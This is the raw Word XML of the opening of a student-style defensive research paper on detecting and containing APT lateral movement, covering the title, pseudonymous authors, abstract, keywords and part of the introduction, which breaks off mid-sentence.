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DF2CD4" w14:textId="752DF8CC" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="004A49CB" w:rsidP="004A49CB">
      <w:pPr>
        <w:pStyle w:val="papertitle"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="48"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="48"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Mitigating APT Lateral Movement: A Network-Based Detection and Containment Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C779BD" w14:textId="77777777" w:rsidR="00D7522C" w:rsidRPr="00FF6966" w:rsidRDefault="00D7522C" w:rsidP="003B4E04">
      <w:pPr>
        <w:pStyle w:val="Author"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="120" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F960E65" w14:textId="77777777" w:rsidR="00D7522C" w:rsidRPr="00FF6966" w:rsidRDefault="00D7522C" w:rsidP="00CA4392">
      <w:pPr>
        <w:pStyle w:val="Author"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="120" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D7522C" w:rsidRPr="00FF6966" w:rsidSect="003B4E04">
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="first" r:id="rId12"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="540" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB2FE26" w14:textId="0B3AF3C2" w:rsidR="00BD670B" w:rsidRPr="00FF6966" w:rsidRDefault="00A56EAB" w:rsidP="00BD670B">
      <w:pPr>
        <w:pStyle w:val="Author"/>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>Chinese Fo0d [Alias]</w:t>
      </w:r>
      <w:r w:rsidR="001A3B3D" w:rsidRPr="00FF6966">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A452ED" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>College of Engineering</w:t>
      </w:r>
      <w:r w:rsidR="00D72D06" w:rsidRPr="00FF6966">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A452ED" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">University of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Yeet</w:t>
      </w:r>
      <w:r w:rsidR="001A3B3D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Nuketown</w:t>
      </w:r>
      <w:r w:rsidR="0028619D" w:rsidRPr="00FF6966">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008B7DB7" w:rsidRPr="00FF6966">
        <w:t>USA</w:t>
      </w:r>
      <w:r w:rsidR="001A3B3D" w:rsidRPr="00FF6966">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>ChineseFo0d@fakedomain.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCCE042" w14:textId="6041A262" w:rsidR="001A3B3D" w:rsidRPr="00FF6966" w:rsidRDefault="00A17F8E" w:rsidP="007B6DDA">
      <w:pPr>
        <w:pStyle w:val="Author"/>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00BD670B" w:rsidRPr="00FF6966">
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="00A56EAB">
        <w:t>Jaefae [Alias]</w:t>
      </w:r>
      <w:r w:rsidR="001A3B3D" w:rsidRPr="00FF6966">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B0504D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>College of Engineering</w:t>
      </w:r>
      <w:r w:rsidR="001A3B3D" w:rsidRPr="00FF6966">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F7479A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">University of </w:t>
      </w:r>
      <w:r w:rsidR="00A56EAB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Yeet</w:t>
      </w:r>
      <w:r w:rsidR="001A3B3D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A56EAB">
        <w:t>Nuketown</w:t>
      </w:r>
      <w:r w:rsidR="007C3B68" w:rsidRPr="00FF6966">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008B7DB7" w:rsidRPr="00FF6966">
        <w:t>USA</w:t>
      </w:r>
      <w:r w:rsidR="001A3B3D" w:rsidRPr="00FF6966">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A56EAB">
        <w:t>Jaefae@fakedomain.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316535E" w14:textId="39FCD74C" w:rsidR="009F1D79" w:rsidRPr="00FF6966" w:rsidRDefault="009F1D79" w:rsidP="008A5942">
      <w:pPr>
        <w:pStyle w:val="Author"/>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:sectPr w:rsidR="009F1D79" w:rsidRPr="00FF6966" w:rsidSect="003B4E04">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="450" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="3" w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A88E65D" w14:textId="77777777" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00BD670B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidSect="003B4E04">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="450" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="3" w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B763665" w14:textId="3B8BA3F8" w:rsidR="00331D8D" w:rsidRPr="00FF6966" w:rsidRDefault="009303D9" w:rsidP="00972203">
      <w:pPr>
        <w:pStyle w:val="Abstract"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00363E20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advanced Persistent Threats (APTs) are stealthy, sophisticated cyberattacks that infiltrate targeted networks gathering sensitive information for extended periods. APT attacks aim to remain undetected to steal sensitive information or spy on network activities and other means such as espionage, sabotage of critical systems, warfare, competition, financial gain, or political motivations. Common techniques involved with A</w:t>
      </w:r>
      <w:r w:rsidR="00080E0F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PT</w:t>
      </w:r>
      <w:r w:rsidR="00363E20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s consist of custom malware with obfuscation or use of software exploits, lateral movement tools to move deeper into the network, pass-the-hash, privilege escalation, credential dumping, social engineering, DDoS, Command and Control (C2), Living off the Land (LOTL)…and more. APTs are very multifaceted</w:t>
      </w:r>
      <w:r w:rsidR="002A6D9F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00363E20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but at their core</w:t>
      </w:r>
      <w:r w:rsidR="002A6D9F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00363E20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> they rely on the network as their center of information and path to escalate. This research focuses on how to identify APTs and mitigate their impact</w:t>
      </w:r>
      <w:r w:rsidR="00780233" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="002A6D9F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00780233" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specific focus on </w:t>
      </w:r>
      <w:r w:rsidR="000D47DE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">simulating a Lateral Movement attack that </w:t>
      </w:r>
      <w:r w:rsidR="00EB2818" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="000D47DE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commonly employed by APT</w:t>
      </w:r>
      <w:r w:rsidR="00977080" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s.</w:t>
      </w:r>
      <w:r w:rsidR="00363E20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The challenge lies in detecting APTs early, as they operate covertly, gradually gaining control or access over affected systems – especially when APT techniques and tools are carefully planned to avoid detecting by blending into legitimate traffic or using encrypting/hidden communication channels making them </w:t>
      </w:r>
      <w:r w:rsidR="00B577C6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>harder</w:t>
      </w:r>
      <w:r w:rsidR="00363E20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find until significant damage has already been done (data theft, major interruption to operations, damage to systems, danger to human life..). How to differentiate what suspicious activity is and what is not?</w:t>
      </w:r>
      <w:r w:rsidR="005136F4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B51803" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidR="002449A8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B51803" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> this study aims to traverse and recommend strategies to </w:t>
      </w:r>
      <w:r w:rsidR="00DD0F5D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">specifically </w:t>
      </w:r>
      <w:r w:rsidR="00B51803" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">combat </w:t>
      </w:r>
      <w:r w:rsidR="00DD0F5D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">lateral movement attack strategies that often occur in </w:t>
      </w:r>
      <w:r w:rsidR="002449A8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the APT kill chain</w:t>
      </w:r>
      <w:r w:rsidR="00DD0F5D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidR="00F27062" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">outcomes will include </w:t>
      </w:r>
      <w:r w:rsidR="00877C7A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">recommendations </w:t>
      </w:r>
      <w:r w:rsidR="002449A8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on defense strategies to enhance organizational resilience against APTs. NOTE: This is only the beginning of our research</w:t>
      </w:r>
      <w:r w:rsidR="0014688B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B10678" w14:textId="6903D4A2" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="004D72B5" w:rsidP="00AF4E90">
      <w:pPr>
        <w:pStyle w:val="Keywords"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Keywords—</w:t>
      </w:r>
      <w:r w:rsidR="00162342" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">APT, Lateral Movement, Defense in Depth, </w:t>
      </w:r>
      <w:r w:rsidR="00D77934" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidR="001A5D53" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Segmentation</w:t>
      </w:r>
      <w:r w:rsidR="00AF4E90" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, CALDERA, </w:t>
      </w:r>
      <w:r w:rsidR="00354D0E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Machine Learning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A521F3C" w14:textId="6B18A4F4" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="009303D9" w:rsidP="006B6B66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157666D5" w14:textId="40805AA8" w:rsidR="00AA5BF9" w:rsidRPr="00FF6966" w:rsidRDefault="00AA5BF9" w:rsidP="00AA5BF9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Persistent Threats (APTs) have emerged as a formidable challenge in the cybersecurity landscape, representing a new breed of sophisticated attacks that pose significant risks to organizations and nations. Unlike traditional cyber threats, APTs are characterized by their stealthy nature, prolonged duration, and highly targeted approach, making them particularly difficult to detect and mitigate. These attacks infiltrate networks </w:t>
      </w:r>
      <w:r w:rsidR="000539A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intending to gather</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sensitive information over extended periods, often evading traditional security methods. </w:t>
      </w:r>
      <w:r w:rsidR="0095248E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Over 70% of modern security breaches </w:t>
      </w:r>
      <w:r w:rsidR="00D93295" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">have had </w:t>
      </w:r>
      <w:r w:rsidR="00F7475B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>threat actors</w:t>
      </w:r>
      <w:r w:rsidR="00D93295" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizing lateral movement </w:t>
      </w:r>
      <w:r w:rsidR="00944B6B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">within their attack, with the breach being discovered </w:t>
      </w:r>
      <w:r w:rsidR="000D2FAC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oftentimes</w:t>
      </w:r>
      <w:r w:rsidR="00944B6B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> months</w:t>
      </w:r>
      <w:r w:rsidR="000D2FAC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> later</w:t>
      </w:r>
      <w:r w:rsidR="00DC5A0F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r w:rsidR="00DC5A0F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB8B0D" w14:textId="5F65075A" w:rsidR="00AA5BF9" w:rsidRPr="00FF6966" w:rsidRDefault="00AA5BF9" w:rsidP="00AA5BF9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The prolonged duration of APTs is a deliberate strategy.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080E0F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers would move slowly and cautiously through a compromised network, minimizing detectable activity or blending in to avoid triggering security alerts. This “low and slow” approach allows them to remain undetected for months or even years, maximizing the amount of valuable data they can exfiltrate. During that time, they may expand access </w:t>
      </w:r>
      <w:r w:rsidR="000539A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>moving laterally within the network to reach more valuable targets (especially as they gain more information while within).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BE745A" w14:textId="7D06307C" w:rsidR="00902AE0" w:rsidRPr="00FF6966" w:rsidRDefault="00AA5BF9" w:rsidP="00CF22B4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>At their core, APTs are orchestrated by well-resourced adversaries who are state-sponsored groups, highly organized criminal networks</w:t>
      </w:r>
      <w:r w:rsidR="000539A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or hacktivists with strategic objectives. Meaning they possess the funds and a team with advanced technical ability and often leverage new technologies. Especially, the means of launching zero-day attacks to persist in target systems. The motivations behind APT campaigns are diverse but typically fall into three main categories:</w:t>
      </w:r>
      <w:r w:rsidR="00CF22B4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF22B4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CF22B4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">data exfiltration, sabotage, and espionage. </w:t>
      </w:r>
      <w:r w:rsidR="00CF22B4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CF22B4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">So, things under those categories could be disrupting critical infrastructure, warfare, financial gain, political aims, competition such as stealing trade secrets or intellectual property, or simply </w:t>
      </w:r>
      <w:r w:rsidR="004F0733" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> access</w:t>
      </w:r>
      <w:r w:rsidR="00952459" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by placing </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seeds</w:t>
      </w:r>
      <w:r w:rsidR="00952459" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/pivots</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for long-term intelligence gathering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1842A860" w14:textId="5410375E" w:rsidR="00DE2573" w:rsidRPr="00FF6966" w:rsidRDefault="00077DD1" w:rsidP="00077DD1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00565531" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s clear to see that the scope and impact APTs possess is massive. </w:t>
      </w:r>
      <w:r w:rsidR="00106D3B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">And though it is vital to develop solutions for </w:t>
      </w:r>
      <w:r w:rsidR="00844CDB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">all of its kill chain phases, </w:t>
      </w:r>
      <w:r w:rsidR="00001C38" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">we place our focus on lateral movement. </w:t>
      </w:r>
      <w:r w:rsidR="009B6615" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lateral movement is a critical phase in the Advanced Persistent Threat (APT) kill chain, representing techniques adversaries use to navigate and expand their foothold within a compromised network. APT resilience can be achieved via this stage, often by using legitimate tools and credentials to evade detection while escalating privileges and accessing high-value</w:t>
      </w:r>
      <w:r w:rsidR="00DD5FE8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> targets. Lateral movement is also referred to as internal </w:t>
      </w:r>
